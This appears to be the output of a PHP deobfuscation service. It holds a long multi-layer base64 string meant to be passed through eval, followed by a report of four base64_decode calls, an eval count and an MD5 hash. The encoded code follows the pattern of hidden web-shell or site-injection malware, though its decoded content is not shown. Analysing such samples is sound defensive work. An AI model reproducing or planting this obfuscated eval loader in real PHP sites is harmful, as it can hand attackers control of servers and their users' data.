wVjJwU2FWWXpZek5YUlZKQ1RVVXhTRlJ0T1ZsU1JWVjNWRlpvUzFrd01WVlhXSEJoVjBaRk5WcEdhRk5aTURGVlZWUktUVlpIWkhCVE1WSXdZa1pyZVdGSVdrdFNhbXg1V2tSSk5XTkdiRmhpZW1SaFYwZG9kMXBGVG01alJUaDZUVlJzWVZZemFEWlhiRTVEWTBad2NHRklaRlppVmxwMVYwUkplR0ZIVWtaVWJUbE1VVEJzTWxNd1RrcGtWWEJIVDFoc2FGWXhTVEZYVmswd1lWWm9SVkZVUms1VmVteDNVMWRzTTJFeFozaFVhMXBXWWtad1IxWlhlSHBoVms1SFZXMU9UbFpGYTNkWFJXaHVUVlV4UjA5V1dsbFNSVlkxVkZSR05FNUZOVVZXYkU1WlRVVmFTVlZzV2pObFJURlZWMnhXU21KRVFuZFRNV2g2WVRGbmVsTnFTbUZOYkc5M1YxZHZkMkV4WjNwV2FrSnFZbGQzTVZsWE5VNWtWV3h4VDFkb1dWSkZWWGRVYWtZelpVVTFSVlp0VG14U1JuQnpWMFZvYmswd05VZGtNMlJQWld4V2NGUkhiRk5hYkd4MVkwaEthR0pVYkhSVVIyeEtZbFpvUlZKVVNrNWlTR2N3Vkcxd1YySldjRmRrTTJoUFlXdHdhbHBWVWs5aE1HeHdUa2QwV1UweWR6RlhWRXBMWWxWNGNGTlhNV2xTTUZwcVdsVlNZV0pHY0RaTlIyeE5ZVlpLYlZscVRtdGtSMDE1WVVSQ2JHSnNSakZUVjJ4aFkwWm9TVnA2VGs1U1JFSndWRWRzVTFwc2IzcFVhbFpwVWpOU2RsZFhOVVprVld4elpETmtUMUpHY0dwYVZWSmFUVWRKZVUxRWJFcGhWRkp5VjBSS2MwNXRVbGxWYWtKcllsZE9NVk5YZUROa01EVkZWMjA1V1ZKRlZYbFVhMW96WlVVMWNWVnVaRmxUUjJRMlYydE9TbVJWY0VkUFYyeHJWMGQ0ZDFkVVRsTk5SMFp3VGtkc1dWTkhaRFZVYlRWWFdUQXhWVmRZYkZsU1JWVjRWRlpSZDJGVmVIQlZiVnBxVmpCYWVWbFhNWE5pUm14WlZWaFdTbUZXY0ROWFdHOTNZVlY0Y0ZWdFdtRmlWa2w1VjJwS1NtUlZiSE5sUkZKT1lXeHdOVmRzV2pST1JUVTJXa2hzYUZkR1NuTlhWbVJMV1RKV1JWZHRjR0ZXUkVKd1ZFZHNVMXB0UmxobFNGWnFVWHBTY0ZkRmFHNWxWVFYxVkcxT1RsWkdSalpYUlZKR1RXc3hkR0pJWkd0U1JFSndWRWRzVTFwdFNuVlRhbHBxWlc1T2NsZEVTakJOTWtsNVlrZG9hR0ZxUm0xWmVrNVhZbGRPU1ZScVNtaFJNbVJ5VjBST1MwMXNiM2xYYWtKYVlWZHpNMWxXWkZwaU1HeFlWbTVTYWxOR1NURlRNRTVUV20xRmVscElXbWhXTUZwNFV6Rk9jMDR5UmxoWFZ6bExVbXBzZVZwRVNUVmpSbXhZWW5wc1VWVXdjR3BhVlZKT1RWWm9TVm96Y0U1U2JtUXpWRzF3UW1GVmRGbGtSV3hoVmxWYWNsVnNhRXBpTUd4eVlVWldXVk5IWTNoVWExcERXVEF4UlZaVVRrNVZlbFpxV2xWU1RtUXhhRVZSVkVKT1VrWmFhbFJWVWxwa01XaEZVVlJLVGxFd1NrdFhSVkpHVFZVMWMyVkVVazlsYkVweldUSXdNV0ZHYUVsYWVrcGFUVmhuTUZSWGNFTlpNREZWVTFod1dWSkZWWGRVYkZvMFRrVTFObE50VGs1V1JtdDVWMnhvUzFrd01VVlZXR1JaVTBkamQxUnNhRXRaTURGVlYxaHNhVTB3YkhCVE1WSXdZa2RXU0dKRVFreFJNbk16V214a2MySlZkRWRVYkZwU1ltczBkMVpYYkc1aE1XZDVaRVJPYVUxdGVHOVpWMnd6WWpKR1dFNVVRa3hXYTNCUldrWmpNVkpWZEVWUldFcE9VVE5PTTFNeFRqTmlNSGhWVVZob1RsSkdiSGxVUmxKQ1pVVTFObGRZUWsxVk1tUXdWRlZTVWsxVk1VUk5SMlJOVmtWR05WUlljRlpqUlhRMVlVaENhV0pzUm5kV1YzTTFUVmRLZEZWWE9VNWxhMVo1VkZod1JtTkZkRlZOUkd4S1lraGtNMVJ1Y0ZOWk1sWkZWRzB4YkZKNlJucFRWMnh6VGpKR1NGWnJTbUZTVmxvMVV6Qk9TMWt3TVZWUldIQlpVa1ZWZUZScVNURk5SbkJYWkROb1QxWkdiM2RVUmxwVFRsZE9SMlF6YUU5U1JscHFWRlZTYW1WV2FFVlJWRUpPVW01bk1GUnVjRk5aTURGVlZWUkdiRk5HUmpKWFJWSkdUVEF4U0UxWVRsQk5XR1F6Vkd0U1EyRnRSa2hTYlU1c1VrZE9OVmw2U2xkTlJrSlpWbTFPVGxaR2EzZFhiV3QzVGtWc2NHRjZaRzFXTVZwNldYcEtWMDR4VGtoV2JXaGhVakZhTlZNd1RrdFpNbFpGVlZod2FVMVlaekJVYlRGWFRVWndWMlF6YUU5V1JtOTNWRVphVTFrd01WVlpNMmhxVWpGVk1sTlZhRk5aTURGVlZWUkdiRk5HUmpKWFJXaHVUV3M1U1ZWdVVsbFNSVlY0Vkd0YU5FNUZNSGxUVjJSWlVrVlZkMVJVUmpST1JUVnhZVWRPYkZKR2JEUlpNalZQV1RBeFZWVlVSbGxTUlZWNVZHdFJlRTFXYUVWU1ZFcFBVbTVrTkZSclVtRlpNREZGVmxSR1VGRXdiSGRVZWsxNFlrWnJlV0ZJV2t0U2FteDVXa1JKTldOR2JGaGllbVJoVjBkb2QxcEZUbTVqUlRoNlRWUnNZVll6YURaWGJFNURZMFp3Y0dGR1JtcGhNVnBKVjBSQmVHRkhVa2hVYTJ4TVVUQndhbFJWVWxaTk1IUkVVMWhXUzFKcWJEVlpWbVJUVGxac1ZFNUhiRmxUUjJRMVZERmFORTVGTVhSWGJVNU9Wa1pXTkZOWGJETmhNV2Q0Vkd0YVZtSkdjRWRXVjNoNllWWk9SMVZzVmxsU1JWWTFWRlZaTlZVeGFFbGFla0pQVm01bk1GUnJVbUZaTURGVlVWUkdWbUV4V2xSVFYzZDNZMFYwV1dNeWRGbE5NRzk1VjJwS1lVMUdiSEZOUjNSWlRURlpkMWt5TVhOT1YwWjFWRmhXU21KSVpETlVibkJyWVVadmVWWnVWbXRTUkVKd1ZFZHNVMXBzYkhWalNFcG9ZbFJzZEZSSGJFcGlWMDV6WkROb1QxSkdXblJYYkZvMFRrVTFObE50VG14U1JUVnlVMWRyTUdFeFozcGlSRlphVFd0d2RGUkhiRXBpVm1oSlducEtXazFyV2pGWFJXaHVUV3MxTmsxSGJFMWhWa3B0V1dwT2EyUkhUWGxoUkVKc1lteEdNVk5YYkdGalIwNUhaRE5rVDJWc1ZuQlVSMnhUV214dmVsUnFWbWxTTTFKMlYxYzFSbVJWYkhCWGJYUlpVa1ZWZUZScVJqUk9SVFYwVlcxT1RsSkhUWGhUVjJzd1lURm5lV0pFV210WFJrbDNXa2N4YW1SVmJIQlhiVGxyVTBaS00xZEZVa0pOTURWVVUxaFdTMUpxYkhCYVJtaHpZMFpyZWxWcVFtaGhWRkp3VjBWU1FrMUZOWFZXYm14WlUwZGplVlF4V2pST1JUQjVWVmRzVFdGV1NtMVpNV1JIWTIxR2RHSkhlRnBYUmtZeFUxZDRNMlF3TlVWWGJtUlpVMGRqZVZSVVJqTmtNRFUyVmxkc1RXRldTbTFYYlRGVFRXeHZlVk5ZVmtwaFZuQnFWRlpTV21WV2NGbGFSMDVzVWtkT05WbFdhRk5pUm1oSlducEtUbFl3Y0hwWFJWSkdUVVUxVlUxSGJFMWhWa3B0V1Zaa05HUlhUa1ZqTW5SWlRXNVJlbGxxU25OaFIwWnhUVmRhYWsweFduUlpNR2hQVFcxR1JGb3lkRmxOTUc5NVYycEtZVTFHYkhCaGVtUm9WakZzZGxOcldUVmpiVkY1VDFoQ1dsWXlPRFZWUms1S1RWVXhSVkZYYkV4WFNGSktWV3hXUjJFeFNsbFRWemxLWWtoa05GUldVa05XVmxwSFVWaGFUbFY2VWpOVFZWbzBUa1V4TmxaWVpGbFNSVVY1VkZWT1ExTnNhRVZTVkVaUFlraGtORlJ0Y0ZOWk1ERlZWVlJHV1ZOSFkzcFVWekF4V1RBeFZWVllhR2xTYm1RelZHdFNRMVpHYUVsYWVrcFBWbTVrTkZSdGNFdE5iSEJaVTFka1UxZEZjRFZYUldodVRXeHdkVk5YYkV4V1NGSnpXbFZrYzAxRmRFUmhlbVJ0VmpGYWVsbDZTbFphTWtaWVYxYzVTbFl4V2pCWk1HaFRUbFYwUkZWdFdtaE5NbEl5V1Zaa1IyTlZkRlJpUkdSb1VqRmFiMWRyVmxkVk1IUkVVMnRzV1ZKRlZqVlVhMW8wVGtVMVZWVnRUazVXUld3elZFaHdSbVJXYUVsYU0zQk9WVEJGZDFSVldqUk9SVEUyVlcxT2JGSkZiRE5YUlZKR1pVVTFjMlF6YUU5V1IxRjNVMVZXWVdSdFVsZGtNMmhQVmtad2NsTlhiSEpPTVhCWVZHMDVhV1ZXU20xWlZFNXJaRzFHV0ZKdVJsQk5iRmt3V1Zab1VtSXdkRlZrUkd4dFZqRmFlbGw2U2xkT01scFZZM2s1VVZwNk1EbEphV3R3VDNsQkwxQm5QVDBpS1NrN0lEOCsiKSk7ID8+")); ?>

Function Calls

base64_decode 4

Variables

None

Stats

MD5 399d0ed0c4d2e0a8fe466000e700ae8c
Eval Count 4
Decode Time 103 ms